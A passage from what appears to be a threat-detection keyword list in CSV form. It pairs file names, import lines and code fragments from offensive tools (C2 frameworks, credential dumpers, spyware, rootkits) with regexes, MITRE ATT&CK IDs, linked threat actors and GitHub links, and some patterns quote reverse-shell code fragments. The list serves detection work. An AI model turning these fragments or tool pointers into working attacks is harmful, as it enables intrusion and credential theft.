with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48350" "*implant/sliver/*",".{0,1000}implant\/sliver\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","48351" "*Implant\SleepMask*",".{0,1000}Implant\\SleepMask.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48352" 
"*implant_rootkit.sh*",".{0,1000}implant_rootkit\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","48353" "*implant-callback.*",".{0,1000}implant\-callback\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","48354" "*Implants/powershell.ps1*",".{0,1000}Implants\/powershell\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","48355" "*ImplantSSP.csproj*",".{0,1000}ImplantSSP\.csproj.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","48356" "*import _eternalhush*",".{0,1000}import\s_eternalhush.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","48357" "*import adexpsnapshot*",".{0,1000}import\sadexpsnapshot.{0,1000}","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1087.002 - T1482 - T1083 - T1003.008","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/c3c/ADExplorerSnapshot.py","1","0","N/A","N/A","10","10","956","126","2025-03-14T16:13:41Z","2021-12-22T14:42:23Z","48358" "*import apypykatz*",".{0,1000}import\sapypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","48359" "*import base64,sys;exec(base64.b64decode(*",".{0,1000}import\sbase64,sys\;exec\(base64\.b64decode\(.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","4","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48360" "*import BaseSprayModule*",".{0,1000}import\sBaseSprayModule.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","48361" "*import BlankOBF*",".{0,1000}import\sBlankOBF.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","48362" "*import bloodhound.ad.authentication*",".{0,1000}import\sbloodhound\.ad\.authentication.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","48363" "*import 
bloodhound.enumeration.*",".{0,1000}import\sbloodhound\.enumeration\..{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","48364" "*import check_currrent_user_privilege*",".{0,1000}import\scheck_currrent_user_privilege.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","48365" "*import check_sudoers_misconfigurations*",".{0,1000}import\scheck_sudoers_misconfigurations.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","48366" "*import 'dart:io';*Socket.connect(*, *Process.start('sh', [])*socket.write(output);*",".{0,1000}import\s\'dart\:io\'\;.{0,1000}Socket\.connect\(.{0,1000},\s.{0,1000}Process\.start\(\'sh\',\s\[\]\).{0,1000}socket\.write\(output\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","48367" "*import DCSYNC*",".{0,1000}import\sDCSYNC.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","48368" "*import DNSListener*",".{0,1000}import\sDNSListener.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","48369" "*import dploot.triage.*",".{0,1000}import\sdploot\.triage\..{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","48370" "*import DPLootSMBConnection*",".{0,1000}import\sDPLootSMBConnection.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","48371" "*import EnablePersistence*",".{0,1000}import\sEnablePersistence.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation 
activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","48372" "*import eternalhush.*",".{0,1000}import\seternalhush\..{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","48373" "*import EVILRDPConsole*",".{0,1000}import\sEVILRDPConsole.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","48374" "*import EvilRDPGUI*",".{0,1000}import\sEvilRDPGUI.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","48375" "*import
IBurpExtender*",".{0,1000}import\sIBurpExtender.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","48376" "*import impacket*",".{0,1000}import\simpacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48377" "*import ImpactDecoder*",".{0,1000}import\sImpactDecoder.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48378" "*import 
ImpactPacket*",".{0,1000}import\sImpactPacket.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48379" "*import LdapSearchBofParser*",".{0,1000}import\sLdapSearchBofParser.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","48380" "*import metame",".{0,1000}import\smetame","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","N/A","6","580","88","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z","48381" "*import mythic*",".{0,1000}import\smythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","48382" "*import np_server*",".{0,1000}import\snp_server.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black 
Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","48383" "*import org.jnativehook.keyboard.NativeKeyListener*",".{0,1000}import\sorg\.jnativehook\.keyboard\.NativeKeyListener.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","48384" "*import Payload*",".{0,1000}import\sPayload.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48385" "*import pe.OBJExecutable*",".{0,1000}import\spe\.OBJExecutable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and 
alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","0","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","48386" "*Import powerview*",".{0,1000}Import\spowerview.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","48387" "*import 
PupyConfig*",".{0,1000}import\sPupyConfig.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","48388" "*import pypykatz*",".{0,1000}import\spypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","48390" "*import saint.email.SendEmail*",".{0,1000}import\ssaint\.email\.SendEmail.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","48392" "*import saint.screenshot.Screenshot*",".{0,1000}import\ssaint\.screenshot\.Screenshot.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - 
TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","48393" "*import saint.webcam.Cam*",".{0,1000}import\ssaint\.webcam\.Cam.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","48394" "*import ShadowForgeHome*",".{0,1000}import\sShadowForgeHome.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","48395" "*import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(*subprocess.call([""""/bin/sh*",".{0,1000}import\ssocket,subprocess,os\;s\=socket\.socket\(socket\.AF_INET,socket\.SOCK_STREAM\)\;s\.connect\(.{0,1000}subprocess\.call\(\[\""\/bin\/sh.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#linux","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","48398" "*import Stager*",".{0,1000}import\sStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48400" "*Import stealed session to Chromium..*",".{0,1000}Import\sstealed\ssession\sto\sChromium\.\..{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#content","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","48401" "*import subbrute*",".{0,1000}import\ssubbrute.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","48402" "*import teamsenum.auth*",".{0,1000}import\steamsenum\.auth.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","0","#content","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","48403" "*import 
try_to_crack_hash*",".{0,1000}import\stry_to_crack_hash.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#content","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","48404" "*import udmp_parser*",".{0,1000}import\sudmp_parser.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","48405" "*import wapiti*",".{0,1000}import\swapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","48406" "*import wfuzz*",".{0,1000}import\swfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","48407" "*import*autorecon.config*",".{0,1000}import.{0,1000}autorecon\.config.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
